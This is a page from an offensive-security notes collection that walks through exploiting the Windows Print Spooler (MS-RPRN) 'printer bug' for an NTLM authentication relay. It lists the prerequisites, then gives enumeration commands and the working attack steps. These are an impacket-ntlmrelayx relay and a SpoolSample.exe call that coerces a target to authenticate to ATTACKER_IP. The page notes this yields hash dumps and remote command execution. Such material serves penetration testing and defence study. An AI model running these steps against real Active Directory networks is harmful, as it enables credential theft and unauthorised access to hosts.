Exploiting authentication relay ~ Print Spooler Service

Resources

  1. Print System Remote Protocol (MS-RPRN)

Logo[MS-RPRN]: Print System Remote ProtocolMicrosoftLearn

  1. Print Spooler Service

Logo[MS-PRSOD]: Print Spooler ServiceMicrosoftLearn

  1. Impacket scripts

Logoimpacket-scripts | Kali Linux ToolsKali Linux

  1. SpoolSample exploitation script

LogoGitHub - leechristensen/SpoolSample: PoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. This is possible via other protocols as well.GitHub

A certain bug or "feature" in Microsoft Print System Remote Protocol (MS-RPRN) allows a domain user to remotely force a target host running the Print Spooler service to authenticate to an arbitary IP address.

Note that the attack discussed below can be unstable, and may cause the Print Spooler service to crash, and the success of the attack varies.

To exploit this flaw, we need to meet the following requirements:

  1. A valid set of AD account credentials

  • To have access to machines within the AD network, to perform required tasks in the other steps

  1. Network connectivity to the target's SMB service

  2. The target host must be running the Print Spooler service

  3. The hosts involved must not have SMB signing enforced

The sections below discusses how to explore the requirements listed above.

#3 The target host must be running the Print Spooler service

We can utilize a few WMI queries from another machine on the network (with network connectivity to the target host) to query the current state:

PS> GWMI Win32_Printer -ComputerName <target>
# OR
PS> Get-PrinterPort -ComputerName <target>

Note that the success of this may vary, as Microsoft has been limiting the view on these ports from the network perspective.

#4 The hosts involved must not have SMB signing enabled

We can use nmap to enumerate the SMB signing enforcement on our target hosts:

$ nmap --script=smb2-security-mode -p445 <target1> <target2>

Ideally, we look for the following output: "Message signing enabled but not required".

Exploitation

From Bloodhound, we may be able to find a situation where a computer (machine account) has privileges over another computer, and is running the Print Spooler service that we can exploit. This means that we can coerce the first host to authenticate to the second host.

To which we can perform an authentication relay attack to gain access to the second host as the machine account of our original target host. If the machine account has a dangerous privilege over the other host, we can further exploit it to gain more access.

  1. First, we can use ntlmrelayx.py from impacket scripts to setup the NTLM relay:

This should be ran from the attacker machine

$ impacket-ntlmrelayx -smb2support -t smb://"TARGET IP" -debug

  • TARGET_IP : the IP address of the second host to which we want to relay the NTLM authentication to

    • Note that we specify the IP address instead of the hostname as we want to prevent Kerberos authentication (which relies on the hostname) from happening

  1. Next, we have to coerce our target with the SpoolSample exploitation script:

C:\> SpoolSample.exe <target> "ATTACKER_IP"

  • <target> : Hostname of the target host (to which we wish to coerce the authentication from)

  • ATTACKER_IP : the IP address of our attacker machine from the first step

  1. After performing step 3, we will now have received an authentication attempt and a relay to the second host (from the ntlmrelayx impacket script on the attacker machine), while also an automatic hashdump which may provide use with credentials to get a shell on the host.

Optionally, we can use supply the -c flag to ntlmrelayx.py to execute a commnd on the target system (for SMB and RPC).

PreviousKerberos delegationNextGroup Policy Objects (GPOs)

Last updated